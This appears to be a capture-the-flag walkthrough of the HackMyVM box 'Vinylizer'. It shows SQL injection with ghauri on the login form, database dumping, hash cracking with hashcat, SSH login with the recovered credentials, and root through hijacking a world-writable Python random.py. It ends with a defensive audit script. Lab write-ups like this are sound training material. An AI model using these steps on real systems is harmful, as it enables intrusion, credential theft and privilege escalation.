HackMyVm : Vinylizer

Vinylizer

OS : Debian

IP : 172.20.10.3

Nmap :

└─$ nmap -sC -sV 172.20.10.3
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-04 18:11 EST
Nmap scan report for 172.20.10.3
Host is up (0.00023s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f8:e3:79:35:12:8b:e7:41:d4:27:9d:97:a5:14:b6:16 (ECDSA)
|_ 256 e3:8b:15:12:6b:ff:97:57:82:e5:20:58:2d:cb:55:33 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Vinyl Records Marketplace
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds

Port 80 Enumeration :

Visited : http://172.20.10.3/
Homepage

The login page is there…

Login page

Intercepted the login request using Burp Suite

Intercepting the login request

Let's save the Burp request and run sqlmap or ghauri against it to check whether there are any database vulnerabilities.

$ ghauri -r req -p username --dbs
Databases

There are three databases available.

Let's dump vinyl_marketplace.

Tables in vinyl_marketplace db

The vinyl_marketplace database contains a single table called users.

$ ghauri -r req -p username --dbms mysql -D vinyl_marketplace -T users --dump
Reading the vinyl_marketplace

Got a hashed password for the username shopadmin and a plaintext password for lana.

Let's try to crack the hash using hashcat…

$ hashcat -a 0 -m 0 "9432522ed1a8fca612b11c3980a031f6" tools/rockyou.txt.gz --show

9432522ed1a8fca612b11c3980a031f6 : addicted2vinyl

Cracking the hash

Let's try an SSH login using the credentials

shopadmin : addicted2vinyl

SSH Login

Great, we are shopadmin now.

Privilege Escalation :

To search for files we have write permission on:

$ find / -type f -writable 2>/dev/null

We can see that /usr/lib/python3.10/random.py has 777 permissions:

-rwxrwxrwx 1 root root 33221 Nov 20 15:14 /usr/lib/python3.10/random.py

Let's use Python library hijacking: modify the library code so that it executes /bin/bash -p

Edited random.py

After that, simply run vinylizer.py using python3

Executing vinylizer.py

Boom! Rooted….. 
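
The root cause here is a standard-library module that any user can rewrite. As an added example (not part of the original writeup), this audit walks the interpreter's import directories and reports every .py file or directory that is group- or world-writable. The function names and the temporary test tree in demo() are constructed for illustration.

```python
import os
import stat
import sys
import tempfile

RISKY = stat.S_IWGRP | stat.S_IWOTH  # writable by group or by everyone


def audit_import_path(paths):
    """Return sorted (path, mode) pairs for .py files and directories under
    `paths` whose mode bits let non-owners write to them."""
    findings = set()
    for root in paths:
        if not os.path.isdir(root):
            continue  # sys.path may hold zip files or missing entries
        for dirpath, _dirnames, filenames in os.walk(root):
            candidates = [dirpath] + [
                os.path.join(dirpath, f) for f in filenames if f.endswith(".py")
            ]
            for path in candidates:
                st = os.lstat(path)
                if stat.S_ISLNK(st.st_mode):
                    continue  # a symlink's own mode bits say nothing useful
                if st.st_mode & RISKY:
                    findings.add((path, stat.filemode(st.st_mode)))
    return sorted(findings)


def demo():
    """Build a constructed library tree that mimics the finding on this box."""
    with tempfile.TemporaryDirectory() as lib:
        os.chmod(lib, 0o755)
        good = os.path.join(lib, "string.py")
        bad = os.path.join(lib, "random.py")
        for p, mode in ((good, 0o644), (bad, 0o777)):
            with open(p, "w") as fh:
                fh.write("# constructed sample module\n")
            os.chmod(p, mode)  # chmod is explicit, so the umask does not matter
        return [(os.path.basename(p), m) for p, m in audit_import_path([lib])]


if __name__ == "__main__":
    # On a real host: audit every directory the interpreter imports from.
    for path, mode in audit_import_path([p for p in sys.path if p]):
        print(mode, path)
```

Any hit under a system path such as /usr/lib/python3.10 should be reset to root-owned 644 (755 for directories) and the file compared against the distribution package's copy.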
